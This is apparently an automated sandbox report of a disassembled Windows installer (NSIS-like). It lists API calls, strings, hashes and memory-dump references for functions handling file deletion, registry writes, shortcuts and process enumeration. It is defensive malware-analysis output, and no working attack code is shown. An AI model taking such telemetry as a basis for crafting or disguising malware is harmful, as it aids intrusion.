CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
lstrcmpA.KERNEL32(name,?), ref: 00406FC7
CloseHandle.KERNEL32(?), ref: 004071E6

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

GetTTFNameString, xrefs: 00406F07
name, xrefs: 00406FBF
%s: failed opening file "%s", xrefs: 00406F0C

Memory Dump Source

Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9CFE.jbxd

Similarity

API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
String ID: %s: failed opening file "%s"$GetTTFNameString$name
API String ID: 1916479912-1189179171
Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64

Function 00406C9B Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 190filestringCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
lstrcatW.KERNEL32(0045C918,\*.*), ref: 00406D09
lstrcatW.KERNEL32(?,00408838), ref: 00406D29
lstrlenW.KERNEL32(?), ref: 00406D2C
FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
FindClose.KERNEL32(?), ref: 00406E33

Strings

Delete: DeleteFile failed("%s"), xrefs: 00406DFD
RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
\*.*, xrefs: 00406D03
RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
Delete: DeleteFile("%s"), xrefs: 00406DBC

Memory Dump Source

Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9CFE.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
API String ID: 2035342205-3294556389
Opcode ID: 929039bad7d15a30b60f6521e1025dcf5eb1071aca27ca1d219e219807f84f48
Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
Opcode Fuzzy Hash: 929039bad7d15a30b60f6521e1025dcf5eb1071aca27ca1d219e219807f84f48
Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD

Function 00406805 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 00406926
@%F, xrefs: 00406A53
@%F, xrefs: 0040682C
\Microsoft\Internet Explorer\Quick Launch, xrefs: 004069DF

Memory Dump Source

Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9CFE.jbxd

Similarity

API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 3581403547-784952888
Opcode ID: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
Opcode Fuzzy Hash: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D

Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E

Strings

CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560

Memory Dump Source

Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9CFE.jbxd

Similarity

API ID: CreateInstance
String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
API String ID: 542301482-1377821865
Opcode ID: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
Instruction ID: c24c797a6f187c751e7d972b1a807078ee58ffeb38f484aa28d094541f0f6205
Opcode Fuzzy Hash: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
Instruction Fuzzy Hash: 02415E74A00205BFCF04EFA0CC99EAE7B79FF48314B20456AF915EB2E1C679A941CB54

Function 00402E18 Relevance: 1.5, APIs: 1, Instructions: 27fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27

Memory Dump Source

Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9CFE.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: b5b7ab79f27b5d75a187df3fe9f711fb4388b9579a399927462dc59dec62d440
Instruction ID: b91193b5dd17d351e639dca097a4c2443a83fae7855d8014906372cda19badf2
Opcode Fuzzy Hash: b5b7ab79f27b5d75a187df3fe9f711fb4388b9579a399927462dc59dec62d440
Instruction Fuzzy Hash: 4EE06D32600204AFD700EB749D45ABE736CDF01329F20457BF146F20D1E6B89A41976A

Function 004063AC Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
lstrlenW.KERNEL32(?), ref: 004063CC
GetVersionExW.KERNEL32(?), ref: 0040642A

Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031

LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
FreeLibrary.KERNEL32(00000000), ref: 004064D4
GlobalFree.KERNEL32(?), ref: 004064DD

Strings

EnumProcessModules, xrefs: 0040648A
Kernel32.DLL, xrefs: 0040659B
Module32NextW, xrefs: 004065DE
EnumProcesses, xrefs: 00406482
Process32NextW, xrefs: 004065C8
GetModuleBaseNameW, xrefs: 00406494
Process32FirstW, xrefs: 004065BD
Unknown, xrefs: 004064FC
Module32FirstW, xrefs: 004065D3
PSAPI.DLL, xrefs: 00406464
CreateToolhelp32Snapshot, xrefs: 004065B5

Memory Dump Source

Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9CFE.jbxd

Similarity

API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
API String ID: 20674999-2124804629
Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68

Function 00405479 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
ShowWindow.USER32(?), ref: 004054D2
DestroyWindow.USER32 ref: 004054E6
SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
GetDlgItem.USER32(?,?), ref: 00405523
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
IsWindowEnabled.USER32(00000000), ref: 0040553E
GetDlgItem.USER32(?,00000001), ref: 004055ED
GetDlgItem.USER32(?,00000002), ref: 004055F7
SetClassLongW.USER32(?,000000F2,?), ref: 00405611
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
GetDlgItem.USER32(?,00000003), ref: 00405708
ShowWindow.USER32(00000000,?), ref: 0040572A
EnableWindow.USER32(?,?), ref: 0040573C
EnableWindow.USER32(?,?), ref: 00405757
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
EnableMenuItem.USER32(00000000), ref: 00405774
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
SetWindowTextW.USER32(?,00447240), ref: 004057DC
ShowWindow.USER32(?,0000000A), ref: 00405910

Strings

@rD, xrefs: 004057B9

Memory Dump Source

Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9CFE.jbxd

Similarity

API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
String ID: @rD
API String ID: 184305955-3814967855
Opcode ID: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
Opcode Fuzzy Hash: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E

Function 004040B8 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
GetDlgItem.USER32(?,000003E8), ref: 00404181
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
GetSysColor.USER32(?), ref: 004041AF
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
lstrlenW.KERNEL32(?), ref: 004041D6
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2

Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004

GetDlgItem.USER32(?,0000040A), ref: 0040424A
SendMessageW.USER32(00000000), ref: 00404251
GetDlgItem.USER32(?,000003E8), ref: 0040427E
SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
SetCursor.USER32(00000000), ref: 004042D2
ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
SetCursor.USER32(00000000), ref: 004042F6
SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337

Strings

N, xrefs: 0040426C
open, xrefs: 004042DF
@%F, xrefs: 004042A7

Memory Dump Source

Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9CFE.jbxd

Similarity

API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
String ID: @%F$N$open
API String ID: 3928313111-3849437375
Opcode ID: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
Instruction ID: 2c1438ad93098d7b112eeb2502b55652a68651cb38e922ac8f4fb42b83a973d4
Opcode Fuzzy Hash: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
Instruction Fuzzy Hash: 0F71A4B1900609FFDB109F60DD45EAA7B79FB44305F00843AFA05B62D1C778A991CF99

Function 00406A99 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 163filestringmemoryCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(0045B2C8,NUL), ref: 00406AA9
CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1

Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8

GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
wsprintfA.USER32 ref: 00406B4D
GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37

Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76

WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
GlobalFree.KERNEL32(00000000), ref: 00406C52
CloseHandle.KERNEL32(?), ref: 00406C5C

Strings

[Rename], xrefs: 00406BC8, 00406BD7
NUL, xrefs: 00406A9E
F, xrefs: 00406AE8
%s=%s, xrefs: 00406B43

Memory Dump Source

Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9CFE.jbxd

Similarity

API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
String ID: F$%s=%s$NUL$[Rename]
API String ID: 565278875-1653569448
Opcode ID: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
Opcode Fuzzy Hash: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010D8
FillRect.USER32(00000000,?,00000000), ref: 004010ED
DeleteObject.GDI32(?), ref: 004010F6
CreateFontIndirectW.GDI32(?), ref: 0040110E
SetBkMode.GDI32(00000000,00000001), ref: 0040112F
SetTextColor.GDI32(00000000,000000FF), ref: 00401139
SelectObject.GDI32(00000000,?), ref: 00401149
DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
SelectObject.GDI32(00000000,00000000), ref: 00401169
DeleteObject.GDI32(?), ref: 0040116E
EndPaint.USER32(?,?), ref: 00401177

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9CFE.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
Instruction ID: e7530e13063599d95e155ed3b2c7b7521dfa2668d538c4695d9c695e9582dc0d
Opcode Fuzzy Hash: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
Instruction Fuzzy Hash: 01516C71400209AFCB058F95DE459AF7FB9FF45311F00802EF992AA1A0CB78DA55DFA4

Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
RegCloseKey.ADVAPI32(?), ref: 004029E4

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
WriteReg: error creating key "%s\%s", xrefs: 004029F5
WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1

Memory Dump Source

Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9CFE.jbxd

Similarity

API ID: lstrlen$CloseCreateValuewvsprintf
String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
API String ID: 1641139501-220328614
Opcode ID: d79db666ee92a39b53e47641609ed565b43369f8775619f718224e07aa5483b4
Instruction ID: 4ea7a0066738be70411365ddd6f3e5606018e51d84950e7919a1ab5782edcef9
Opcode Fuzzy Hash: d79db666ee92a39b53e47641609ed565b43369f8775619f718224e07aa5483b4
Instruction Fuzzy Hash: 3D41BFB2D00209BFDF11AF90CE46DAEBBB9EB04704F20407BF505B61A1D6B94B509B59

Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
GlobalFree.KERNEL32(00000000), ref: 00402F17
CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
DeleteFileW.KERNEL32(?), ref: 00402F56

Strings

created uninstaller: %d, "%s", xrefs: 00402F3B

Memory Dump Source

Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
